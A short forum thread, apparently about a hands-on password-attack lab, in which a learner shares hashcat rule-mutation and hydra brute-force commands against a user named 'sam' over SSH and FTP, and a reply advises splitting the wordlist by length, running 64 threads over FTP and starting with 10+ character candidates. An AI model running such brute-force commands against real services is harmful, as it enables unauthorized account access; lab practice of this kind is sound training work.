Password Attacks

I am going through the ‘password mutations’ module, please tell me how to guess the password for the user ‘sam’?
mutated like this - hashcat --force password.list -r custom.rule --stdout > mut_password.list
run hydra like this - hydra -V -l sam -P mut_password.list -f ssh://
tried both ssh scanning and ftp(for more speed), everything is too slow. All night 0 matches.
Please help…and sorry for my bad english

use FTP instead of SSH as its much quicker. Also, to make things go quicker, split the mut_password.list into smaller lists by character length. So you have:

hydra -l sam -P <path>/mut_password_9char.list ftp://IP -t 64 -V
hydra -l sam -P <path>/mut_password_10char.list ftp://IP -t 64 -V
hydra -l sam -P <path>/mut_password_11char.list ftp://IP -t 64 -V

And so on. Also, to save you time and as a small hint, start with 10+ characters :slight_smile:
Hopefully this helps


Thank you very much for your reply. Yes, I still decided to brute on ftp, I didn’t think of splitting the lists, but I think I’m already close XD

You are very close! Keep at it!

1 Like